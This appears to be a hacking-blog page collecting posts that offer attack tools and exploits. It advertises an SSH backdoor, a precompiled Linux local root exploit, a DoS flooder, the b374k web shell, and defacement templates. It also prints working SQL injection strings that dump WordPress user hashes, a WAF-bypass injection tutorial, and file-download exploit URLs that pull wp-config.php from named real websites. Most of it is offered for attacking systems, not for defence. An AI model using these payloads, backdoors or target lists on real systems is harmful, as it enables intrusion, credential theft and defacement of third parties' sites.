Hacking ASP.Net Website

The best attacking for asp.net web application hacker handbook.

Download

click to begin

1.3MB .pdf

Read More

The Webapplication Hackers HandBook

Chapter 1  Web Application (In)security 
Chapter 2  Core Defense Mechanisms
Chapter 3  Web Application Technologies 
Chapter 4  Mapping the Application 
Chapter 5  Bypassing Client-Side Controls 
Chapter 6  Attacking Authentication 
Chapter 7  Attacking Session Management 
Chapter 8  Attacking Access Controls 
Chapter 9  Attacking Data Stores 
Chapter 10  Attacking Back-End Components 
Chapter 11  Attacking Application Logic 
Chapter 12  Attacking Users: Cross-Site Scripting 
Chapter 13  Attacking Users: Other Techniques 
Chapter 14  Automating Customized Attacks 
Chapter 15  Exploiting Information Disclosure 
Chapter 16  Attacking Native Compiled Applications 
Chapter 17  Attacking Application Architecture 
Chapter 18  Attacking the Application Server 
Chapter 19  Finding Vulnerabilities in Source Code 
Chapter 20  A Web Application Hacker’s Toolkit 
Chapter 21  A Web Application Hacker’s Methodology 

Download

click to begin

13MB .pdf

Read More

Word List Download(sites)

Best sites to Download wordlist...

http://cyberwarzone.com/cyberwarfare/pas...word-lists

http://hashcrack.blogspot.de/p/wordlist-...ds_29.html

http://www.skullsecurity.org/wiki/index.php/Passwords

http://packetstormsecurity.org/Crackers/wordlists/

http://www.isdpodcast.com/resources/62k-...-passwords

http://g0tmi1k.blogspot.com/2011/06/dict...lists.html

http://www.md5this.com/tools /wordlists.html

http://www.md5decrypter.co.uk/ downloads.aspx

Read More

SQL Injection Bypassing HandBook

Content writers :-

Chapter I:::

• SQL Injection: What is it?
• SQL Injection: An In-depth Explanation
• Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?
• Is my database at risk to SQL Injection?
• What is the impact of SQL Injection?
• Example of a SQLInjection Attack

WebApplication Firewalls::

• Detecting A WAF
• Prompt Message
• Dotdefender
• Observing HTTP Response

Chapter II

Advanced evasion techniques for defeating SQL injection Input validation mechanisms
Web applications are becoming more and more technically complex. Web applications, their

• Whitespace
• Null Bytes
• SQL Comments
• URL Encoding
• Changing Cases
• Encode to Hex Forbidden
• Replacing keywords technique
• WAF Bypassing – using characters
• HTTP Parameter Pollution (HPP)
• CRLF WAF Bypass technique
• Buffer Overflow bypassing

Chapter III

Let's see the matter in an orderly fashion from the beginning

• See If Site vulnerability Or Not
• Get Column Number
• Bypassing union select
• Get Version
• Group & Concat
• Bypass with Information_schema.tables
• Requested Baypassing

Chapter IIII

Other issues related to the subject

• Null Parameter
• FIND VULNERABLE COLUMNS
• Count(*)
• unhex()
• Get database
•  

Download : MediaFire

Read More

Best Deface pages Collection

Don't Have Time for designing A Deface page .. ?? 
dont worry here you can download Best Deface Pages, 
Just replace the Name and messgae with your own name and message !!
[Click on Download And Copy The Code, Then Use it, for demo you can paste the code on Pastehtml.com

How to edit and save it... ??
All html codes are shared on pastebin, copy it and paste in notepad
then edit it and save as index.html or anyname.html


1- Tiger M@te's Deface Page, 
This Deface page was uploaded on google bangladesh'd domain Google.com.bd
 : Download


2- Happy Birhthday Deface Page 
for making someone's Birthday special =)
 : Download

3- Deface Page For Long Messages + Video 
Designed By Ffessxt Prince indishell
: Download 


4- #opFreedom Plestine, 
Deface page with free palestine message, Designed by The Hackers army
 : Download


5- Lovely deface Page for Your Girlfried or loved one 
This Deface Page was designed by me =)
 : Download


6-Deface Page with dancing firefox script
 : Download


7-Multi colour deface page
 : Download  


8- Simple Black Deface Page 
Designed by Hax root
 : Download


9-Matrix Style Deface Page
Designed by ShOrTy420
 : Download


10-Pro Style Deface Page 
 : Download


9- Awesome  #opFreedom Plestine Page with New Fuctions
this page desgned by Syakila Daniel
 : Download


10- Awesme Matrix style Deface Page 
Designed by coded32 
: Download


11- Romantic deface Page with Roses
designed by Deepak  Carpenter
: Download


12- Deface Page with Jquery 
Designed by Privatex
 : Download


13- #opmegaupload Deface Page
 : Download

14- A Progammer's Deface Page with Love Letter
Designed by Me .. =)
 : Download

source:  http://www.devilcafe.in

Read More

sshDoor( one of Best ssh backdoor )

 Usage:

./install passwrod port
./install jancok 33
 

open putty
ssh port : 33 login : root password : jancok
[root@serv ~]# uname -a;id
Linux serv.test.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 20010 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv ~]# 

Download:  Here

Read More

Local Root Exploit For Linux Kernel 2.6.32 (precompile)

Note: 
Its a pre-compiled exploit and has been verified for list servers. It might working on other 2.6.32-X kernels too. So, test it and update us in comments. Thanks.
Following is the list of vulnerable kernels which can be rooted with our exploit.

Vulnerable Kernels:

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64

Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64

Linux localhost.domain 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64

Linux localhost.domain 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64

Linux localhost.domain 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64

Linux localhost.domain 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64

Linux localhost.domain 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64

Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64

Linux localhost.domain 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64

Linux localhost.domain 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64

Linux localhost.domain 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64

Linux localhost.domain 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64

Linux localhost.domain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64

Linux localhost.domain 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64

Linux localhost.domain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64

Linux localhost.domain 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64

Linux localhost.domain 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64

Linux localhost.domain 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64

Linux localhost.domain 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64

Linux localhost.domain 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64

Linux localhost.domain 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64

Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64

Linux localhost.domain 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64

Linux localhost.domain 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64

Linux localhost.domain 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64

Linux localhost.domain 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64

Linux localhost.domain 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64

Linux localhost.domain 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64

Linux localhost.domain 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64

Linux localhost.domain 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64

Linux localhost.domain 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64

Linux localhost.domain 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64

Linux localhost.domain 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64

Linux localhost.domain 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64

Linux localhost.domain 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64

Linux localhost.domain 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64

Linux localhost.domain 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64

Linux localhost.domain 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64

Linux localhost.domain 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64

Linux localhost.domain 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64

Linux localhost.domain 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64

Linux localhost.domain 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64

Linux localhost.domain 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64

Linux localhost.domain 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64

Linux localhost.domain 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux 

 Download here

Zip Password: *pakmadhunters* 

credit to  owner :)

Read More

Top 6 Web Vulnerability Scanner Tool

Web site security is very important because the website contain relevant information about a company and now a days website defacement is very common even a script kiddies and a new born hackers can do this. The most common vulnerability like SQL-Injection and cross site scripting lead towards the defacement.

So you want to secure your web application than find vulnerabilities on it before a hacker find it, try to use some relevant tools and find vulnerabilities and fix it. There are so many tools available for both Windows and Linux platform and commercial and open source tool. Below is the best web vulnerability scanner tool that we have discussed before.

OWASP Zed Attack Proxy- ZAP

OWASP or Open Web Application Security Project is a non profit organisation world wide that are focusing on improving the security of web application, for more about OWASP click here.The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It has an automatic scanning functionality and it has a set of tools that allow you to find vulnerability manually.

Web Application Attack and Audit Framework (W3AF)

W3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is working for Become the best Open Source Web Application Exploitation Framework. It is available on Backtrack 5 too.

Skipfish Web Vulnerability Scanner Tool

Skipfish is an automatic web application security tool, that has been designed to find the vulnerabilities on a web application, find vulnerability on your website before than a hacker find and exploit it. It is also available on Backtrack 5.

Nikto-Vulnerability Scanner

Nikto is one of the best open source web vulnerability scanner tool that is available on the famous Linux distribution like Backtrack, Gnacktrack,Backbox and others. You can use it on other distribution and on windows too because it is only need perl script.

Netsparker Web Application Security Scanner

Netsparker is a commercial tool that has been designed to find the vulnerabilities on web application, the free version of netparker is also available so you can download it and can use for a quick penetration testing on a web application.

Websecurify- Website Security Testing Tool

Websecurify is a cross operating system tool that can be run on Windows, Linux and MAC. It is the best tool to find the common web vulnerabilities that can cause a great harm to the web application.

This is just a small list of the best tools you can use Wapiti, Grendel scan and other tools to perform the job, you have any other tool in mind than do share it with us via comment box.

 
source : www.ehacking.net

Read More

ShellfireVPN [One of the best VPN]

[*] German IP Address

[*] For Windows

[*] Normal surfing

[*] Encrypted Internet

[*] Safe surfing hotspot

[*] Bypass firewalls

Download:  https://www.shellfire.de/

Read More

wordpress theme photocrati 4.X.X SQL INJECTION

# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ] 

details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes

attacker can do a remote injection in site URL to get some sensitive information .
=======================================================

Read More

PHPMoAdmin Remote Code Execution

######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
 
[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.
 

Read More

WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection

Google Dork-> /wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=

define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=

1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME

(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name

%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,

%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=

2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR

(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR

(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup

%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');

Read More

RA1N DoSer v4 (lite)

Flooding

• UDP
• TCP
• SYN

Features

• Port Scanning (100+ times faster than RDv3)
• History
• Favorites
• Awesome CPanel
• Defualts for input fields for flooding
• and more!

Tech Specs:

• Over 25kbs a UDP Flood
• Cusstomizable SYN Flooding (using exploitations)
• Encrypted source (noobs piss me off)
• TCP Flooding (very efficient)
• program averages only 5,000 kbs of processing

[x] Download ->  http://dl.dropbox.com
[x] Download ->  http://mediafire.com
 
[x] Virusscan ->
Code: https://www.virustotal.com/

credit : RA1N

Read More

Admin Login Grabber

Very easy to use:
1. just put your target
2. Click Grabb
3. Then result will show up
4. Just click on the result link and it will open automactlly
5. Enjoy
6. Give thanks if u liked it

Dont delete the albdevil.txt because without that it doesnt work.
U must have netframe4 installed to open it.

Virusscan: https://www.virustotal.com

Download: http://localhostr.com
Download: http://mediafire.com

Read More

Wordpress force download Local File Download

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress force download  Local File Download
[+]
[+] Exploit Author: Ashiyane Digital Security Team , Milad Hacking
[+]
[+] Date: 2015-02-22
[+]
[+] Google Dork 1 : inurl:wp-content inurl:force-download.php?file=
[+]
[+] Vendor Homepage : http://elouai.com/force-download.php
[+]
[+] Tested on:  Kali , Mozilla FireFox
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+]  Location : [localhost]/patch/force-download.php?file=[LFD]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Demo :
[+]
[+] http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
[+]
[+]
[+] http://www.bricomarchesollies.com/force-download.php?file=wp-config.php
[+]
[+] http://www.globalvoip.ca/force-download.php?file=wp-config.php
[+]
[+] http://www.hairline.it/force-download.php?file=wp-config.php
[+]
[+] http://vismatica.com/force-download.php?file=wp-config.php
[+]
[+] http://daileyortho.com/wp-content/uploads/patientforms/force-download.php?file=../../../wp-config.php
[+]
[+]
[+] http://www.cfpsych.org/wp-content/force-download.php?file=../wp-config.php
[+]
[+] http://www.islanegrawines.com/force-download.php?file=wp2/wp-config.php
[+]
[+] http://vismatica.com/force-download.php?file=/home/vismatic/public_html/wp-config.php
[+]
[+] http://www.kanazawa-adc.com/force-download.php?file=wp-config.php
[+]
[+] www.ciudadanosindependientes.es/wp-content/themes/ucin/includes/force-download.php?download=1&file=/homepages/40/d544309672/htdocs/wp-config.php
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Discovered By : Milad Hacking , Iliya Norton

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+]   Spcial Tnx To Admin   , packetstormsecurity.com
[+]
[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] 

Via-> intelligentexploit.com

Read More

b374k shell v2.8 Decode Version

b374k shell 2.8

This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser
Features :

• File manager (view, edit, rename, delete, upload, download, archiver, etc)
• Search file, file content, folder (also using regex)
• Command execution
• Script execution (php, perl, python, ruby, java, node.js, c)
• Give you shell via bind/reverse shell connect
• Simple packet crafter
• Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
• SQL Explorer
• Process list/Task manager
• Send mail with attachment (you can attach local file on server)
• String conversion
• All of that only in 1 file, no installation needed
• Support PHP > 4.3.3 and PHP 5

Requirements :

• PHP version > 4.3.3 and PHP 5
• As it using zepto.js v1.1.2, you need modern browser to use b374k shell. See browser support on zepto.js website http://zeptojs.com/
• Responsibility of what you do with this shell 

Password-> b374k

Download

click to begin

0.7MB .zip

Read More

Gr3eNoX Exploit Scanner SQLi/XSS/LFi/RFi v1.1

Updates

• XSS Scanner
• RFi Scanner Bug fixed
• Remove Duplicate algoritm chanded

Virus Scans: http://elementscanner.net//?RE=96825...d4ebb04cae10b5
https://www.virustotal.com/file/7c23...is/1339689371/
 
Download:  http://localhostr.com/kX3lVjuVOOmd 
or
Download: Mediafire.com

Read More

SSHDroid apk file version 1.9.4

Developer: Berserker
Version: 1.9.4
Requires Android: and up
Category: Tools & Personalizzation

You are going to download the SSHDroid apk file version 1.9.4, that is the latest version; you can install it on your Android device by following the short how-to that you'll find on this page. Connect through SSH to your device!SSHDroid is a SSH server implementation for Android.This applicatio......read more >

More information about the app

View the page of the app SSHDroid to have more information about the application, read user and Staff reviews, write your reviews and download a different version.

How to install an apk file on your Android device

Here following, how to do it in 4 steps:

1. Download the apk file to your device sdcard (if your device is connected to internet you can do it directly on it, otherwise you have to download the file on your pc and then transfer it to the sdcard of your device)
2. On your device press menu and go to Settings->Security, check that the "Unknown sources" voice is enabled. If not, enable it.
   In some old Android version the "Unknown sources" voice is located under Settings->Applications
3. Use a file manager, as for example Astro, to search the apk file in your sd card and click to install it
4. Now your app is installed.

How was your experiece with this app?

Once you have installed and used SSHDroid, it's very important that you rate and review it. You can describe your experience and give a score from 1 to 10 to the app. Your contribution will help other users to choose among the applications the better ones, and will help developers to improve their apps.
To write a review you need to access and use the button that you can find on the app page.

Important remarks

TorrApk team has absolute respect for developers work and thinks it's right that it have to be paid. For this reason on TorrApk you can find only apk files, original and unmodified, of applications that are given for free.

The team works hard to identify and eliminate as soon as possible all the apps deemed to be malicious that are absolutely not allowed on TorrApk.

If you think that SSHDroid does not comply these criteria, please report it immediately using the button to report an issue that you can find on app page.

Download

click to begin

1.0MB .zip

Read More

Metasploit Penetration Testing Cookbook

Set up a complete penetration testing environment using metasploit and virtual machines.
Learn to penetration-test popular operating systems such as Windows7, Windows 2008 Server, Ubuntu etc.
Get familiar with penetration testing based on client side exploitation techniques with detailed analysis of vulnerabilities and codes
Avail of exclusive coverage of antivirus bypassing techniques using metasploit
Master post-exploitation techniques such as exploring the target, keystrokes capturing, sniffing, pivoting, setting persistent connections etc.

Build and analyze meterpreter scripts in Ruby
Build and export exploits to framework
Use extension tools like Armitage, SET etc.

 <div class="abt-button">
      <a href="http://adf.ly/14063G">Download</a>
      <p class="up">click to begin</p>
      <p class="down">1.2MB .zip</p>
    </div>

Read More

WAF Bypass Sql Injection(Tutorial)

Today I am going to show you how to bypass Web Application Firewalls ( WAF ). I will demonstrate from the Simpliest and most Basic Techniques to the Most Advanced ones!

NOTE: If you don’t know SQL Injection, read this first…

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections!

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).

Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….

(We get a 403 Error!)

Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:

You can use comments to bypass WAF:

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

(First Method that can Bypass WAF)

However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters:

You can also change the Case of the Command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….

(Another Basic Method to Bypass WAF!)

However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” )

This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!

5) Inline Comments:

Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

(The %55 is equal to “U” and %53 to “S”. See more on the Advanced Section….)

I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

(( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:

We can replace some characters with their HEX (URL-Encoded) Values.

Example:

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:

Apart from the “UNION SELECT” other commands might be blocked.

Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD

@@version | version()

concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU

group_concat() | concat_ws()

Learning MySQL Really helps on such issues!

4) Misc Exploitable Functions:

Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):

Example:

This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4&#8230 ;

(If the Firewall removes the “*”, the result will be: 15+union+select….)

So, if you find such a silly function, you can exploit it, in this way!

[+] In addition to the previous example, some other bypasses might be:

-15+(uNioN)+(sElECt)….

-15+(uNioN+SeleCT)+…

-15+(UnI)(oN)+(SeL)(ecT)+….

-15+union (select 1,2,3,4…)

 (This tutorial was originally created by Akatzbreaker for Hackforums.net.   The original Post is here… )

Read More